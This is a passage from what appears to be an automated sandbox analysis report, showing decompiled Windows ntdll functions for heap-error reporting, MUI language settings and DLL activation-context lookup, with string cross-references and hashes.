Function 036B1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E036B1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x35d48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E035FB150();
				} else {
					E035FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x36e589c);
				E035FB150("Heap error detected at %p (heap handle %p)\n",  *0x36e58a0);
				_t27 =  *0x36e5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M036B1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E035FB150();
				} else {
					E035FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E035FB150("Error code: %d - %s\n",  *0x36e5898);
				_t113 =  *0x36e58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E035FB150();
					} else {
						E035FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E035FB150("Parameter1: %p\n",  *0x36e58a4);
				}
				_t115 =  *0x36e58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E035FB150();
					} else {
						E035FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E035FB150("Parameter2: %p\n",  *0x36e58a8);
				}
				_t117 =  *0x36e58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E035FB150();
					} else {
						E035FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E035FB150("Parameter3: %p\n",  *0x36e58ac);
				}
				_t119 =  *0x36e58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E035FB150();
					} else {
						E035FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x36e58b4);
					E035FB150("Last known valid blocks: before - %p, after - %p\n",  *0x36e58b0);
				} else {
					_t120 =  *0x36e58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E035FB150();
				} else {
					E035FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E035FB150("Stack trace available at %p\n", 0x36e58c0);
			}

0x036b1c10
0x036b1c16
0x036b1c1e
0x036b1c3d
0x036b1c3e
0x036b1c20
0x036b1c35
0x036b1c3a
0x036b1c44
0x036b1c55
0x036b1c5a
0x036b1c65
0x036b1c67
0x00000000
0x036b1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x036b1c67
0x036b1cdc
0x036b1ce5
0x036b1d04
0x036b1d05
0x036b1ce7
0x036b1cfc
0x036b1d01
0x036b1d0b
0x036b1d17
0x036b1d1f
0x036b1d25
0x036b1d30
0x036b1d4f
0x036b1d50
0x036b1d32
0x036b1d47
0x036b1d4c
0x036b1d61
0x036b1d67
0x036b1d68
0x036b1d6e
0x036b1d79
0x036b1d98
0x036b1d99
0x036b1d7b
0x036b1d90
0x036b1d95
0x036b1daa
0x036b1db0
0x036b1db1
0x036b1db7
0x036b1dc2
0x036b1de1
0x036b1de2
0x036b1dc4
0x036b1dd9
0x036b1dde
0x036b1df3
0x036b1df9
0x036b1dfa
0x036b1e00
0x036b1e0a
0x036b1e13
0x036b1e32
0x036b1e33
0x036b1e15
0x036b1e2a
0x036b1e2f
0x036b1e39
0x036b1e4a
0x036b1e02
0x036b1e02
0x036b1e08
0x00000000
0x00000000
0x036b1e08
0x036b1e5b
0x036b1e7a
0x036b1e7b
0x036b1e5d
0x036b1e72
0x036b1e77
0x036b1e95

Strings

HEAP[%wZ]: , xrefs: 036B1C30, 036B1CF7, 036B1D42, 036B1D8B, 036B1DD4, 036B1E25, 036B1E6D
heap_failure_multiple_entries_corruption, xrefs: 036B1C8A
heap_failure_buffer_underrun, xrefs: 036B1C9F
heap_failure_invalid_argument, xrefs: 036B1CAD
heap_failure_usage_after_free, xrefs: 036B1CBB
Parameter3: %p, xrefs: 036B1DEE
heap_failure_buffer_overrun, xrefs: 036B1C98
heap_failure_internal, xrefs: 036B1C6E
heap_failure_block_not_busy, xrefs: 036B1CA6
heap_failure_virtual_block_corruption, xrefs: 036B1C91
heap_failure_lfh_bitmap_mismatch, xrefs: 036B1CD7
heap_failure_invalid_allocation_type, xrefs: 036B1CB4
heap_failure_generic, xrefs: 036B1C7C
Heap error detected at %p (heap handle %p), xrefs: 036B1C50
HEAP: , xrefs: 036B1C16, 036B1C3D, 036B1D04, 036B1D4F, 036B1D98, 036B1DE1, 036B1E32, 036B1E7A
Parameter2: %p, xrefs: 036B1DA5
Parameter1: %p, xrefs: 036B1D5C
heap_failure_listentry_corruption, xrefs: 036B1CD0
Stack trace available at %p, xrefs: 036B1E86
Error code: %d - %s, xrefs: 036B1D12
Last known valid blocks: before - %p, after - %p, xrefs: 036B1E45
heap_failure_freelists_corruption, xrefs: 036B1CC9
heap_failure_entry_corruption, xrefs: 036B1C83
heap_failure_cross_heap_operation, xrefs: 036B1CC2
heap_failure_unknown, xrefs: 036B1C75

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 9106cbc629ac4ea96a159dd678d807f88e1dbdf07e62b2a937e1851a7e0e992a
Instruction ID: 5b41998dfdfd556017dc3d241efc21ed3403ed79b59639a63301d33585a74a75
Opcode Fuzzy Hash: 9106cbc629ac4ea96a159dd678d807f88e1dbdf07e62b2a937e1851a7e0e992a
Instruction Fuzzy Hash: 3D61A337661295EFC315FB84F4A6D6573F4FB06920B09806AFA0A5F326D73499828F09

Uniqueness

Uniqueness Score: -1.00%

Function 03603D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E03603D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E03601B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E03601B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E03601B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E03601B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E03601B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L03614620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0363F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E03641370(_t276, 0x35d4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0363BB40(0,  &_v68, _t170);
									if(L036043C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0363BB40(_t257,  &_v68, _t243);
								if(L036043C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E03641370(_t278, 0x35d4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L03614620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0363F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E03641370(_v16, 0x35d4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0363BB40(_t262,  &_v68, _t244);
								if(L036043C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E03641370(_t282, 0x35d4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0363BB40(_t262,  &_v68, _t201);
							if(L036043C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L03614620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0363F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E03641370(_t280, 0x35d4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0363BB40(_t267,  &_v68, _t245);
							if(L036043C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E03641370(_t284, 0x35d4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0363BB40(_t267,  &_v68, _t224);
						if(L036043C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x03603d3c
0x03603d42
0x03603d44
0x03603d46
0x03603d49
0x03603d4c
0x03603d4f
0x03603d52
0x03603d55
0x03603d58
0x03603d5b
0x03603d5f
0x03603d61
0x03603d66
0x03658213
0x03658218
0x03604085
0x03604088
0x0360408e
0x03604094
0x0360409a
0x036040a0
0x036040a6
0x036040a9
0x036040af
0x036040b6
0x036040bd
0x036040bd
0x03603d83
0x0365821f
0x03658229
0x03658238
0x03658238
0x0365823d
0x0365823d
0x03603da0
0x03603daf
0x03603db5
0x03603dba
0x03603dba
0x03603dd4
0x03603e94
0x03603eab
0x03603f6d
0x03603f84
0x0360406b
0x0360406b
0x0360406e
0x0360406e
0x03604070
0x03604074
0x03658351
0x03658351
0x0360407a
0x0360407f
0x0365835d
0x03658370
0x03658377
0x03658379
0x0365837c
0x0365837c
0x0365835d
0x00000000
0x0360407f
0x03603f8a
0x03603f8d
0x03603f90
0x03603f95
0x0365830d
0x0365830f
0x03603f9b
0x03603fac
0x03603fae
0x03603fb1
0x03603fb1
0x03603fb6
0x03658317
0x0365831a
0x00000000
0x03603fbc
0x03603fc1
0x03603fc9
0x03603fd7
0x03603fda
0x03603fdd
0x03604021
0x03604021
0x03604029
0x03604030
0x03604044
0x03604046
0x03604046
0x03604044
0x03604049
0x03658327
0x03658334
0x03658339
0x0365833c
0x0360404f
0x0360404f
0x0360404f
0x03604051
0x03604056
0x03604063
0x03604063
0x03604068
0x00000000
0x03604068
0x03603fdf
0x03603fe2
0x03603fe4
0x03603fe7
0x03603fef
0x03604003
0x03604005
0x03604005
0x0360400c
0x03604013
0x03604016
0x03604017
0x0360401b
0x0360401e
0x00000000
0x0360401e
0x03603fb6
0x03603eb1
0x03603eb4
0x03603eb7
0x03603ebc
0x036582a9
0x036582ab
0x03603ec2
0x03603ed3
0x03603ed5
0x03603ed8
0x03603ed8
0x03603edd
0x036582b3
0x036582b6
0x00000000
0x03603ee3
0x03603ee8
0x03603eed
0x03603ef0
0x03603ef3
0x03603f02
0x03603f05
0x03603f08
0x036582c0
0x036582c3
0x036582c5
0x036582c8
0x036582d0
0x036582e4
0x036582e6
0x036582e6
0x036582ed
0x036582f4
0x036582f7
0x036582f8
0x036582fc
0x036582ff
0x036582ff
0x03603f0e
0x03603f11
0x03603f16
0x03603f1d
0x03603f31
0x03658307
0x03658307
0x03603f31
0x03603f39
0x03603f48
0x03603f4d
0x03603f50
0x03603f50
0x03603f53
0x03603f58
0x03603f65
0x03603f65
0x03603f6a
0x00000000
0x03603f6a
0x03603edd
0x03603dda
0x03603ddd
0x03603de0
0x03603de5
0x03658245
0x03603deb
0x03603df7
0x03603dfc
0x03603dfe
0x03603e01
0x03603e01
0x03603e06
0x0365824d
0x0365824f
0x03658254
0x00000000
0x03603e0c
0x03603e11
0x03603e16
0x03603e19
0x03603e29
0x03603e2c
0x03603e2f
0x0365825c
0x0365825f
0x03658261
0x03658264
0x0365826c
0x03658280
0x03658282
0x03658282
0x03658289
0x03658290
0x03658293
0x03658294
0x03658298
0x0365829b
0x0365829b
0x03603e35
0x03603e38
0x03603e3d
0x03603e44
0x03603e58
0x036582a3
0x036582a3
0x03603e58
0x03603e60
0x03603e6f
0x03603e74
0x03603e77
0x03603e77
0x03603e7a
0x03603e7f
0x03603e8c
0x03603e8c
0x03603e91
0x00000000
0x03603e91

Strings

Kernel-MUI-Language-Allowed, xrefs: 03603DC0
Kernel-MUI-Language-Disallowed, xrefs: 03603E97
Kernel-MUI-Language-SKU, xrefs: 03603F70
Kernel-MUI-Number-Allowed, xrefs: 03603D8C
WindowsExcludedProcs, xrefs: 03603D6F

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 7173b7be0d9f7000cfa8013ec8e7ec2ed09ddc8d782c5b546016d752b6d1531b
Instruction ID: 0787fb95c8d95c54b3d521a75b442ccf17f66a9b9e8573f1cc3ccda521395af7
Opcode Fuzzy Hash: 7173b7be0d9f7000cfa8013ec8e7ec2ed09ddc8d782c5b546016d752b6d1531b
Instruction Fuzzy Hash: 81F15176D00219EFCB16DF99CA419EFBBB9FF48650F14006AE905AB350DB709E01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 035F40E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E035F40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E035FB150();
					} else {
						E035FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E035FB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E035FB150(", passed to %s", _t29);
					}
					_push("\n");
					E035FB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x36e6378 = 1;
						asm("int3");
						 *0x36e6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x035f40e6
0x035f40e8
0x035f40f1
0x0365042d
0x0365044c
0x03650451
0x0365042f
0x03650444
0x03650449
0x0365045d
0x03650466
0x0365046e
0x03650474
0x03650475
0x0365047a
0x0365048a
0x0365048c
0x03650493
0x03650494
0x03650494
0x00000000
0x0365049b
0x00000000

Strings

HEAP: , xrefs: 0365044C
Invalid heap signature for heap at %p, xrefs: 03650458
HEAP[%wZ]: , xrefs: 0365043F
, passed to %s, xrefs: 03650469
RtlAllocateHeap, xrefs: 03650468

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: b1a90cc92cf48b3e53e1857716190b4b110a07e5fc735b159cef2aef57b6d438
Instruction ID: 02cb1843540a35f96b672f57ab80087953f2565f8cafadfe081768480ecb5796
Opcode Fuzzy Hash: b1a90cc92cf48b3e53e1857716190b4b110a07e5fc735b159cef2aef57b6d438
Instruction Fuzzy Hash: E701D836204381EED325E768F50DF56B7B4FB41B31F194069F5154F7A1CBA49441C261

Uniqueness

Uniqueness Score: -1.00%

Function 03628E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E03628E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x36ed360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x36e8464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x36e5780 & 0x00000003) != 0) {
							E03675510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x36e5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0363B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x36e7984; // 0xfa2ac8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x36e8464; // 0x74b10110
					 *0x36eb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E03629B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x36e5780 & 0x00000005) != 0) {
						_push(_t49);
						E03675510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x03628e0f
0x03628e16
0x03628e19
0x03628e1b
0x03628e21
0x03628e7f
0x03628e85
0x03669354
0x0366936c
0x03669371
0x0366937b
0x03669381
0x03669381
0x0366937b
0x03628e9d
0x03628e9d
0x03628e29
0x03628e2c
0x03628e38
0x03628e3e
0x03628e43
0x03628eb5
0x03628eb9
0x036692aa
0x036692af
0x036692e8
0x036692e8
0x036692af
0x03628eb9
0x03628e45
0x03628e53
0x03628e5b
0x03628e5f
0x03628e78
0x03628e78
0x03628e7d
0x03628ec3
0x03628ecd
0x03628ed2
0x03628ed2
0x03628ec5
0x03628ec5
0x00000000
0x03628e7d
0x03628e67
0x03628ea4
0x0366931a
0x00000000
0x00000000
0x03669320
0x03628ea4
0x03628e70
0x03669325
0x03669340
0x03669345
0x03669345
0x03628e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 0366933B, 03669367
Querying the active activation context failed with status 0x%08lx, xrefs: 03669357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0366932A
LdrpFindDllActivationContext, xrefs: 03669331, 0366935D

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 9e172428eca307414fe1bc0702025c72768481812d5f2a4dc105c350a7532fbd
Instruction ID: 577009504f65ea09ccd6e6d7b9fb927ac80e31147fee9a682501676701ae1dd7
Opcode Fuzzy Hash: 9e172428eca307414fe1bc0702025c72768481812d5f2a4dc105c350a7532fbd
Instruction Fuzzy Hash: 3B413D32A00B359FDF35EA18CD49A39BEB8BB41744F0F41A9D9955B251E7709C808F83

Uniqueness

Uniqueness Score: -1.00%

Function 036B49A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 036B4A4A, 036B4A5D, 036B4A5F, 036B4AC4
HEAP[%wZ]: , xrefs: 036B4A3D, 036B4AB7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 036B4A61
This is located in the %s field of the heap header., xrefs: 036B4AD6

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 9de89833c9c9b707bf339a89be4bad55e8db5c7a4db44ab8af0141e49ca171a4
Instruction ID: 0e9aa1263af4c35ce972b62acca951a2e50ae532fcbbadf7e6f1810f2b826536
Opcode Fuzzy Hash: 9de89833c9c9b707bf339a89be4bad55e8db5c7a4db44ab8af0141e49ca171a4
Instruction Fuzzy Hash: 21312735200650EFD322EB5AD886FABB3B8FF04620F184155F5168B266DBB0A9C1CF59

Uniqueness

Uniqueness Score: -1.00%

Function 03608794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E03608794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
